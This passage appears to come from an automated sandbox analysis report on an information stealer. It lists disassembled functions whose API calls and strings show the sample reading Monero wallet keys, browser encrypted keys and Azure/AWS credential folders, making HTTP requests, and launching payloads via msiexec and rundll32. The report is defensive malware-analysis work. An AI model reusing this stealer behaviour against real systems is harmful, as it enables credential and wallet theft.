                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,00DA9038,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00DAD4F8,00000000,?,00EE144C,00000000,?,?), ref: 00ECCA6C
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00ECCA89
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00ECCA95
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00ECCAA8
                                • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00ECCAD9
                                • StrStrA.SHLWAPI(?,00DAD528,00EE0B52), ref: 00ECCAF7
                                • StrStrA.SHLWAPI(00000000,00DAD408), ref: 00ECCB1E
                                • StrStrA.SHLWAPI(?,00DAD7F0,00000000,?,00EE1458,00000000,?,00000000,00000000,?,00DA8FD8,00000000,?,00EE1454,00000000,?), ref: 00ECCCA2
                                • StrStrA.SHLWAPI(00000000,00DAD630), ref: 00ECCCB9
                                  • Part of subcall function 00ECC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00ECC871
                                  • Part of subcall function 00ECC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00ECC87C
                                • StrStrA.SHLWAPI(?,00DAD630,00000000,?,00EE145C,00000000,?,00000000,00DA8E88), ref: 00ECCD5A
                                • StrStrA.SHLWAPI(00000000,00DA90D8), ref: 00ECCD71
                                  • Part of subcall function 00ECC820: lstrcat.KERNEL32(?,00EE0B46), ref: 00ECC943
                                  • Part of subcall function 00ECC820: lstrcat.KERNEL32(?,00EE0B47), ref: 00ECC957
                                  • Part of subcall function 00ECC820: lstrcat.KERNEL32(?,00EE0B4E), ref: 00ECC978
                                • lstrlen.KERNEL32(00000000), ref: 00ECCE44
                                • CloseHandle.KERNEL32(00000000), ref: 00ECCE9C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                • String ID:
                                • API String ID: 3744635739-3916222277
                                • Opcode ID: 416aa3591d160990ecbdffd814772923c859d46ec3733ec38fdfae25fc3a0ab7
                                • Instruction ID: ab53e3178c51fdbd50f3f73c2f1efd02d13d33ccec2fc07260769c142b01dc4b
                                • Opcode Fuzzy Hash: 416aa3591d160990ecbdffd814772923c859d46ec3733ec38fdfae25fc3a0ab7
                                • Instruction Fuzzy Hash: 62E10C76800148AACB19EBA0DC95FEE77B8EF54300F04516AF50673291DE706B87CB65
                                Function 00ED8320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                • RegOpenKeyExA.ADVAPI32(00000000,00DAB3F8,00000000,00020019,00000000,00EE05B6), ref: 00ED83A4
                                • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00ED8426
                                • wsprintfA.USER32 ref: 00ED8459
                                • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00ED847B
                                • RegCloseKey.ADVAPI32(00000000), ref: 00ED848C
                                • RegCloseKey.ADVAPI32(00000000), ref: 00ED8499
                                  • Part of subcall function 00EDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EDA7E6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseOpenlstrcpy$Enumwsprintf
                                • String ID: - $%s\%s$?
                                • API String ID: 3246050789-3278919252
                                • Opcode ID: e750ccd1c1aab1bb93e721dc1c5e55d744765a13c98ff12fe24093aa089ebaba
                                • Instruction ID: 5431431c43f89785cadc67b314f2dbcd9b8f9b1cf9b0500426d2e143c2dff626
                                • Opcode Fuzzy Hash: e750ccd1c1aab1bb93e721dc1c5e55d744765a13c98ff12fe24093aa089ebaba
                                • Instruction Fuzzy Hash: 26811E719102189BDB29DF50DD95FEA77B8FF48700F0092AAE509A6240DF716B86CF94
                                Function 00ED4D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00ED8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00ED8E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00ED4DB0
                                • lstrcat.KERNEL32(?,\.azure\), ref: 00ED4DCD
                                  • Part of subcall function 00ED4910: wsprintfA.USER32 ref: 00ED492C
                                  • Part of subcall function 00ED4910: FindFirstFileA.KERNEL32(?,?), ref: 00ED4943
                                • lstrcat.KERNEL32(?,00000000), ref: 00ED4E3C
                                • lstrcat.KERNEL32(?,\.aws\), ref: 00ED4E59
                                  • Part of subcall function 00ED4910: StrCmpCA.SHLWAPI(?,00EE0FDC), ref: 00ED4971
                                  • Part of subcall function 00ED4910: StrCmpCA.SHLWAPI(?,00EE0FE0), ref: 00ED4987
                                  • Part of subcall function 00ED4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00ED4B7D
                                  • Part of subcall function 00ED4910: FindClose.KERNEL32(000000FF), ref: 00ED4B92
                                • lstrcat.KERNEL32(?,00000000), ref: 00ED4EC8
                                • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00ED4EE5
                                  • Part of subcall function 00ED4910: wsprintfA.USER32 ref: 00ED49B0
                                  • Part of subcall function 00ED4910: StrCmpCA.SHLWAPI(?,00EE08D2), ref: 00ED49C5
                                  • Part of subcall function 00ED4910: wsprintfA.USER32 ref: 00ED49E2
                                  • Part of subcall function 00ED4910: PathMatchSpecA.SHLWAPI(?,?), ref: 00ED4A1E
                                  • Part of subcall function 00ED4910: lstrcat.KERNEL32(?,00DAE9E0), ref: 00ED4A4A
                                  • Part of subcall function 00ED4910: lstrcat.KERNEL32(?,00EE0FF8), ref: 00ED4A5C
                                  • Part of subcall function 00ED4910: lstrcat.KERNEL32(?,?), ref: 00ED4A70
                                  • Part of subcall function 00ED4910: lstrcat.KERNEL32(?,00EE0FFC), ref: 00ED4A82
                                  • Part of subcall function 00ED4910: lstrcat.KERNEL32(?,?), ref: 00ED4A96
                                  • Part of subcall function 00ED4910: CopyFileA.KERNEL32(?,?,00000001), ref: 00ED4AAC
                                  • Part of subcall function 00ED4910: DeleteFileA.KERNEL32(?), ref: 00ED4B31
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                • API String ID: 949356159-974132213
                                • Opcode ID: cd013fbc4a60762cb6f933c5af67d9f79817d334656ba70853ec3962a282488a
                                • Instruction ID: f8130aaaf01aa5e57832b5a3d58e40f74e72109ccb22a4aac067e7b078159141
                                • Opcode Fuzzy Hash: cd013fbc4a60762cb6f933c5af67d9f79817d334656ba70853ec3962a282488a
                                • Instruction Fuzzy Hash: 4E41AFBA94030867CB64E770EC47FDD3678AB64700F0054A5B589761C2EEF59BCA8B92
                                Function 00ED9010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                                Download Yara Rule
                                APIs
                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00ED906C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateGlobalStream
                                • String ID: image/jpeg
                                • API String ID: 2244384528-3785015651
                                • Opcode ID: 537c281c599cc3a510d2f74254b06b812795a81b0334b68c2407327a6d2df57d
                                • Instruction ID: fed37d08e9ca6a097c4e21ee18005ed1984b36c4592e905516235c0edcd39c0e
                                • Opcode Fuzzy Hash: 537c281c599cc3a510d2f74254b06b812795a81b0334b68c2407327a6d2df57d
                                • Instruction Fuzzy Hash: 3771ED75D10208ABDB18DBE4ED89FEEB7B8FF48300F108519F516A7284DB75A945CB60
                                Function 00ED2E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00ED31C5
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00ED335D
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00ED34EA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExecuteShell$lstrcpy
                                • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                • API String ID: 2507796910-3625054190
                                • Opcode ID: 3260ee8560272c4d04b0f4f6fedf932b5d03413cedf8dd4b264bb3c11562aff3
                                • Instruction ID: ec3daabb3cc6a394333b299ec62dc525e10d136d909461e1f71274cbc2a073a9
                                • Opcode Fuzzy Hash: 3260ee8560272c4d04b0f4f6fedf932b5d03413cedf8dd4b264bb3c11562aff3
                                • Instruction Fuzzy Hash: 66123E768001089ADB19EBA0DD96FEDB7B8EF54300F44516AF50676291EF702B4BCF62
                                Function 00ED52C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EDA7E6
                                  • Part of subcall function 00EC6280: InternetOpenA.WININET(00EE0DFE,00000001,00000000,00000000,00000000), ref: 00EC62E1
                                  • Part of subcall function 00EC6280: StrCmpCA.SHLWAPI(?,00DAE9C0), ref: 00EC6303
                                  • Part of subcall function 00EC6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00EC6335
                                  • Part of subcall function 00EC6280: HttpOpenRequestA.WININET(00000000,GET,?,00DAE388,00000000,00000000,00400100,00000000), ref: 00EC6385
                                  • Part of subcall function 00EC6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00EC63BF
                                  • Part of subcall function 00EC6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EC63D1
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00ED5318
                                • lstrlen.KERNEL32(00000000), ref: 00ED532F
                                  • Part of subcall function 00ED8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00ED8E52
                                • StrStrA.SHLWAPI(00000000,00000000), ref: 00ED5364
                                • lstrlen.KERNEL32(00000000), ref: 00ED5383
                                • lstrlen.KERNEL32(00000000), ref: 00ED53AE
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                • API String ID: 3240024479-1526165396
                                • Opcode ID: a539adb6806e32b4638bc4525c910b619f7db3046454fa0eb058f2791766a495
                                • Instruction ID: 270dc17725152ca0a3f2ff9a25d1b5fe76194a9172e9af233b63557c18a0ebac
                                • Opcode Fuzzy Hash: a539adb6806e32b4638bc4525c910b619f7db3046454fa0eb058f2791766a495
                                • Instruction Fuzzy Hash: F1511B359101489BCB18FF64D996AED77B9EF10300F54602AF8067A292EF346B47DB62
                                Function 00ED12D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: 4fe025df4a503ba493b3ff219a23ddb2d2382614739a7170f5faa8f9f507d47e
                                • Instruction ID: e94da6fe545e0db396007c66dec42d9c3e4d006efba68ec57ffa2f92e14bf5b3
                                • Opcode Fuzzy Hash: 4fe025df4a503ba493b3ff219a23ddb2d2382614739a7170f5faa8f9f507d47e
                                • Instruction Fuzzy Hash: 22C196B5D002199BCB18EF60DC89FDA73B8FF54304F0455AAF50A77241EA70AA86CF91
                                Function 00ED4280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00ED8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00ED8E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00ED42EC
                                • lstrcat.KERNEL32(?,00DAE0D0), ref: 00ED430B
                                • lstrcat.KERNEL32(?,?), ref: 00ED431F
                                • lstrcat.KERNEL32(?,00DAD420), ref: 00ED4333
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00ED8D90: GetFileAttributesA.KERNEL32(00000000,?,00EC1B54,?,?,00EE564C,?,?,00EE0E1F), ref: 00ED8D9F
                                  • Part of subcall function 00EC9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00EC9D39
                                  • Part of subcall function 00EC99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EC99EC
                                  • Part of subcall function 00EC99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00EC9A11
                                  • Part of subcall function 00EC99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00EC9A31
                                  • Part of subcall function 00EC99C0: ReadFile.KERNEL32(000000FF,?,00000000,00EC148F,00000000), ref: 00EC9A5A
                                  • Part of subcall function 00EC99C0: LocalFree.KERNEL32(00EC148F), ref: 00EC9A90
                                  • Part of subcall function 00EC99C0: CloseHandle.KERNEL32(000000FF), ref: 00EC9A9A
                                  • Part of subcall function 00ED93C0: GlobalAlloc.KERNEL32(00000000,00ED43DD,00ED43DD), ref: 00ED93D3
                                • StrStrA.SHLWAPI(?,00DAE280), ref: 00ED43F3
                                • GlobalFree.KERNEL32(?), ref: 00ED4512
                                  • Part of subcall function 00EC9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00EC9AEF
                                  • Part of subcall function 00EC9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00EC4EEE,00000000,?), ref: 00EC9B01
                                  • Part of subcall function 00EC9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00EC9B2A
                                  • Part of subcall function 00EC9AC0: LocalFree.KERNEL32(?,?,?,?,00EC4EEE,00000000,?), ref: 00EC9B3F
                                • lstrcat.KERNEL32(?,00000000), ref: 00ED44A3
                                • StrCmpCA.SHLWAPI(?,00EE08D1), ref: 00ED44C0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00ED44D2
                                • lstrcat.KERNEL32(00000000,?), ref: 00ED44E5
                                • lstrcat.KERNEL32(00000000,00EE0FB8), ref: 00ED44F4
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                • String ID:
                                • API String ID: 3541710228-0
